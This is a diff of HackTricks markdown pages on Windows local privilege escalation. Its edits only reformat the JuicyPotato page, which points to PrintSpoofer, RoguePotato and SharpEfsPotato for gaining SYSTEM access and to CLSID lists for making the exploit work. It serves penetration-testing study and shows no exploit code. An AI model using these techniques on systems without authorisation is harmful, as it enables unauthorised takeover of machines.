- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections)
{{#include ../../banners/hacktricks-training.md}}

10
src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
View File

@ -2,8 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
> [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
{{#ref}}
roguepotato-and-printspoofer.md
@ -114,7 +113,9 @@ c:\Users\Public>
Oftentimes, the default CLSID that JuicyPotato uses **doesn't work** and the exploit fails. Usually, it takes multiple attempts to find a **working CLSID**. To get a list of CLSIDs to try for a specific operating system, you should visit this page:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
{{#ref}}
https://ohpe.it/juicy-potato/CLSID/
{{#endref}}
### **Checking CLSIDs**
@ -131,6 +132,3 @@ Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master
- [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
{{#include ../../banners/hacktricks-training.md}}